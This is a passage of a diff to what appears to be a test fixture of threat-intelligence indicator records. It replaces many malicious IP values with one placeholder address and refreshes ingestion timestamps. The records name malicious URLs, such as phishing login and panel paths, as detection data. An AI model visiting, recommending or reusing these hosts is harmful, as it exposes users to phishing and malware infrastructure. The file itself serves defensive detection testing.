CyberCrime\",\"id\":\"indicator--4759e40a-5abd-49dc-90fd-2ba8bac1a613\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:27.808Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:27.808Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30409,7 +30409,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 194.87.146.180", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", "modified": "2020-02-25T02:52:37.329Z", "valid_from": "2020-02-25T02:52:37.329Z", @@ -30431,12 +30431,12 @@ "first_seen": "2020-02-25T02:52:37.329Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "194.87.146.180" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390481344Z", - "original": "{\"created\":\"2020-02-25T02:52:37.329Z\",\"description\":\"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:52:37.329Z\",\"name\":\"mal_ip: 194.87.146.180\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '194.87.146.180']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:37.329Z\"}", + "ingested": "2021-12-13T08:38:40.026543200Z", + "original": "{\"created\":\"2020-02-25T02:52:37.329Z\",\"description\":\"TS ID: 55347597509; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--ae58138e-b594-4519-adb0-6dbbd8377b75\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-02-25T02:52:37.329Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:37.329Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30454,7 +30454,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 81.177.135.161", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime", "modified": "2020-02-25T02:52:38.025Z", "valid_from": "2020-02-25T02:52:38.025Z", @@ -30476,12 +30476,12 @@ "first_seen": "2020-02-25T02:52:38.025Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "81.177.135.161" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390490541Z", - "original": "{\"created\":\"2020-02-25T02:52:38.025Z\",\"description\":\"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-39\"],\"modified\":\"2020-02-25T02:52:38.025Z\",\"name\":\"mal_ip: 81.177.135.161\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '81.177.135.161']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.025Z\"}", + "ingested": "2021-12-13T08:38:40.026548900Z", + "original": "{\"created\":\"2020-02-25T02:52:38.025Z\",\"description\":\"TS ID: 55347597663; iType: mal_ip; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--4c51e9ac-be12-496c-a2d0-7e3536243aef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-39\"],\"modified\":\"2020-02-25T02:52:38.025Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.025Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30532,7 +30532,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390537810Z", + "ingested": "2021-12-13T08:38:40.026555600Z", "original": "{\"created\":\"2020-02-25T02:52:38.053Z\",\"description\":\"TS ID: 55347597470; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--c36b85d9-df19-439b-8605-d7c4b0653977\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:52:38.053Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.053Z\"}", "category": "threat", "type": "indicator", @@ -30584,7 +30584,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390545585Z", + "ingested": "2021-12-13T08:38:40.026562300Z", "original": "{\"created\":\"2020-02-25T02:52:38.531Z\",\"description\":\"TS ID: 55347597659; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--862bddc3-1b58-45b2-a40d-502d50369e0e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-25T02:52:38.531Z\",\"name\":\"mal_url: http://jusqit.com/2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jusqit.com/2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.531Z\"}", "category": "threat", "type": "indicator", @@ -30635,7 +30635,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390551215Z", + "ingested": "2021-12-13T08:38:40.026569100Z", "original": "{\"created\":\"2020-02-25T02:52:38.564Z\",\"description\":\"TS ID: 55347597488; iType: mal_url; State: active; Org: Cyber Cast International, S.A.; Source: CyberCrime\",\"id\":\"indicator--d16f564b-6c1f-4515-97e7-d9a19515dd78\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-25T02:52:38.564Z\",\"name\":\"mal_url: http://webupdateadobe.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://webupdateadobe.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:38.564Z\"}", "category": "threat", "type": "indicator", @@ -30687,7 +30687,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390555453Z", + "ingested": "2021-12-13T08:38:40.026575900Z", "original": "{\"created\":\"2020-02-25T02:52:40.276Z\",\"description\":\"TS ID: 55347597520; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--2c31e18b-164e-42bc-afd8-04815a33e043\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.276Z\",\"name\":\"mal_url: http://gsddfsfasa.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gsddfsfasa.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.276Z\"}", "category": "threat", "type": "indicator", @@ -30706,7 +30706,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 45.143.92.129", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-25T02:52:40.317Z", "valid_from": "2020-02-25T02:52:40.317Z", @@ -30728,12 +30728,12 @@ "first_seen": "2020-02-25T02:52:40.317Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "45.143.92.129" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390559340Z", - "original": "{\"created\":\"2020-02-25T02:52:40.317Z\",\"description\":\"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:40.317Z\",\"name\":\"mal_ip: 45.143.92.129\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.143.92.129']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.317Z\"}", + "ingested": "2021-12-13T08:38:40.026582500Z", + "original": "{\"created\":\"2020-02-25T02:52:40.317Z\",\"description\":\"TS ID: 55347597516; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--8b22f126-3c79-4d20-8e8c-96e50c384ddf\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-25T02:52:40.317Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.317Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30784,7 +30784,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390562987Z", + "ingested": "2021-12-13T08:38:40.026589200Z", "original": "{\"created\":\"2020-02-25T02:52:40.344Z\",\"description\":\"TS ID: 55347597474; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--387937df-4030-4cfe-91b7-bd9795985adc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:40.344Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:40.344Z\"}", "category": "threat", "type": "indicator", @@ -30803,7 +30803,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.98.87.192", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime", "modified": "2020-02-25T02:52:41.781Z", "valid_from": "2020-02-25T02:52:41.781Z", @@ -30825,12 +30825,12 @@ "first_seen": "2020-02-25T02:52:41.781Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.98.87.192" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390566895Z", - "original": "{\"created\":\"2020-02-25T02:52:41.781Z\",\"description\":\"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:52:41.781Z\",\"name\":\"mal_ip: 185.98.87.192\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.98.87.192']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:41.781Z\"}", + "ingested": "2021-12-13T08:38:40.026596100Z", + "original": "{\"created\":\"2020-02-25T02:52:41.781Z\",\"description\":\"TS ID: 55347597465; iType: mal_ip; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fca5d6b6-f486-4a46-a8a6-a1a6cb078a08\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-25T02:52:41.781Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:41.781Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -30881,7 +30881,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390572315Z", + "ingested": "2021-12-13T08:38:40.026603Z", "original": "{\"created\":\"2020-02-25T02:52:52.59Z\",\"description\":\"TS ID: 55347597566; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4f92667a-5e1b-4111-88d4-e3e04405e97a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:52:52.59Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/10/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/10/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.59Z\"}", "category": "threat", "type": "indicator", @@ -30933,7 +30933,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390576182Z", + "ingested": "2021-12-13T08:38:40.026609600Z", "original": "{\"created\":\"2020-02-25T02:52:52.623Z\",\"description\":\"TS ID: 55347597530; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--04bc5b54-46ae-44d7-96a6-863481383436\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:52:52.623Z\",\"name\":\"mal_url: http://anypontop.com/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://anypontop.com/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.623Z\"}", "category": "threat", "type": "indicator", @@ -30952,7 +30952,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 176.119.158.219", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-25T02:52:52.674Z", "valid_from": "2020-02-25T02:52:52.674Z", @@ -30974,12 +30974,12 @@ "first_seen": "2020-02-25T02:52:52.674Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "176.119.158.219" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390580881Z", - "original": "{\"created\":\"2020-02-25T02:52:52.674Z\",\"description\":\"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--65a5607b-388a-4789-98d0-84d77ee94047\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:52.674Z\",\"name\":\"mal_ip: 176.119.158.219\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '176.119.158.219']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.674Z\"}", + "ingested": "2021-12-13T08:38:40.026616300Z", + "original": "{\"created\":\"2020-02-25T02:52:52.674Z\",\"description\":\"TS ID: 55347597522; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--65a5607b-388a-4789-98d0-84d77ee94047\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-25T02:52:52.674Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.674Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31030,7 +31030,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390585049Z", + "ingested": "2021-12-13T08:38:40.026645200Z", "original": "{\"created\":\"2020-02-25T02:52:52.712Z\",\"description\":\"TS ID: 55347597467; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--b70344da-8137-4550-b569-97f0e3020ab1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:52:52.712Z\",\"name\":\"mal_url: http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/deal/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:52.712Z\"}", "category": "threat", "type": "indicator", @@ -31049,7 +31049,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 195.54.33.150", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime", "modified": "2020-02-25T02:52:55.912Z", "valid_from": "2020-02-25T02:52:55.912Z", @@ -31071,12 +31071,12 @@ "first_seen": "2020-02-25T02:52:55.912Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "195.54.33.150" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390588415Z", - "original": "{\"created\":\"2020-02-25T02:52:55.912Z\",\"description\":\"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime\",\"id\":\"indicator--3ff92876-fac4-49a6-ae80-d123206dc224\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-25T02:52:55.912Z\",\"name\":\"mal_ip: 195.54.33.150\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '195.54.33.150']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:55.912Z\"}", + "ingested": "2021-12-13T08:38:40.026672Z", + "original": "{\"created\":\"2020-02-25T02:52:55.912Z\",\"description\":\"TS ID: 55347597506; iType: mal_ip; State: active; Org: Leaseweb Deutschland GmbH; Source: CyberCrime\",\"id\":\"indicator--3ff92876-fac4-49a6-ae80-d123206dc224\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-25T02:52:55.912Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:52:55.912Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31126,7 +31126,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390592643Z", + "ingested": "2021-12-13T08:38:40.026680300Z", "original": "{\"created\":\"2020-02-25T02:53:04.191Z\",\"description\":\"TS ID: 55347597485; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--cb9b2721-6623-44c2-b1e5-143f2291738b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-25T02:53:04.191Z\",\"name\":\"mal_url: http://belt-yard-74.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://belt-yard-74.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:04.191Z\"}", "category": "threat", "type": "indicator", @@ -31178,7 +31178,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390596650Z", + "ingested": "2021-12-13T08:38:40.026684500Z", "original": "{\"created\":\"2020-02-25T02:53:12.657Z\",\"description\":\"TS ID: 55347597478; iType: mal_url; State: active; Org: Confluence Networks; Source: CyberCrime\",\"id\":\"indicator--04c56a59-3a16-4284-9edc-5445bb539ce5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:12.657Z\",\"name\":\"mal_url: http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://atlasdecarqo.com/chief1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:12.657Z\"}", "category": "threat", "type": "indicator", @@ -31230,7 +31230,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390602021Z", + "ingested": "2021-12-13T08:38:40.026687900Z", "original": "{\"created\":\"2020-02-25T02:53:15.804Z\",\"description\":\"TS ID: 55347597559; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--1989ffaf-19a7-4850-b142-d31758a3751f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:15.804Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/11/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/11/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.804Z\"}", "category": "threat", "type": "indicator", @@ -31249,7 +31249,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 104.227.250.186", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime", "modified": "2020-02-25T02:53:15.880Z", "valid_from": "2020-02-25T02:53:15.88Z", @@ -31271,12 +31271,12 @@ "first_seen": "2020-02-25T02:53:15.880Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "104.227.250.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.390606329Z", - "original": "{\"created\":\"2020-02-25T02:53:15.88Z\",\"description\":\"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime\",\"id\":\"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-25T02:53:15.88Z\",\"name\":\"mal_ip: 104.227.250.186\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '104.227.250.186']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.88Z\"}", + "ingested": "2021-12-13T08:38:40.026692900Z", + "original": "{\"created\":\"2020-02-25T02:53:15.88Z\",\"description\":\"TS ID: 55347597483; iType: mal_ip; State: active; Org: Datalot; Source: CyberCrime\",\"id\":\"indicator--66939f56-1a6f-43d1-b7a4-277e3ac55584\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-77\"],\"modified\":\"2020-02-25T02:53:15.88Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:15.88Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -31327,7 +31327,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390611358Z", + "ingested": "2021-12-13T08:38:40.026698Z", "original": "{\"created\":\"2020-02-25T02:53:17.191Z\",\"description\":\"TS ID: 55347597555; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--fe0a731e-e2ff-49ac-a597-150ce46a31fc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.191Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/12/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/12/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.191Z\"}", "category": "threat", "type": "indicator", @@ -31379,7 +31379,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390614975Z", + "ingested": "2021-12-13T08:38:40.026704400Z", "original": "{\"created\":\"2020-02-25T02:53:17.224Z\",\"description\":\"TS ID: 55347597468; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--53d00201-4c9a-4275-9091-4cf08fda4676\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-02-25T02:53:17.224Z\",\"name\":\"mal_url: http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ayoobtextlie.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.224Z\"}", "category": "threat", "type": "indicator", @@ -31431,7 +31431,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390618792Z", + "ingested": "2021-12-13T08:38:40.026711300Z", "original": "{\"created\":\"2020-02-25T02:53:17.256Z\",\"description\":\"TS ID: 55347597466; iType: mal_url; State: active; Org: Uaservers Network; Source: CyberCrime\",\"id\":\"indicator--4e154929-35ec-4f71-8793-6b861a9a98f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-25T02:53:17.256Z\",\"name\":\"mal_url: http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://epperfums.com/divide/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.256Z\"}", "category": "threat", "type": "indicator", @@ -31483,7 +31483,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390626076Z", + "ingested": "2021-12-13T08:38:40.026718200Z", "original": "{\"created\":\"2020-02-25T02:53:17.916Z\",\"description\":\"TS ID: 55347597583; iType: mal_url; State: active; Org: Dataline Ltd; Source: CyberCrime\",\"id\":\"indicator--4ce097b7-254b-41cf-8c7d-934524548fd6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-25T02:53:17.916Z\",\"name\":\"mal_url: http://farsson.com/~zadmin/8/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farsson.com/~zadmin/8/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.916Z\"}", "category": "threat", "type": "indicator", @@ -31535,7 +31535,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390629743Z", + "ingested": "2021-12-13T08:38:40.026725Z", "original": "{\"created\":\"2020-02-25T02:53:17.952Z\",\"description\":\"TS ID: 55347597508; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime\",\"id\":\"indicator--51f063d7-600f-43c3-9f88-92e4b3b603da\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-25T02:53:17.952Z\",\"name\":\"mal_url: http://petrouretro.pw/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petrouretro.pw/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-25T02:53:17.952Z\"}", "category": "threat", "type": "indicator", @@ 